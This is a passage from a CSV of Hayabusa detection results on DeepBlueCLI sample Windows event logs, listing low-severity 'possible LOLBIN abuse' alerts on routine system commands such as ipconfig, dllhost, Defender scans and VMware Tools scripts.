0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 
13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
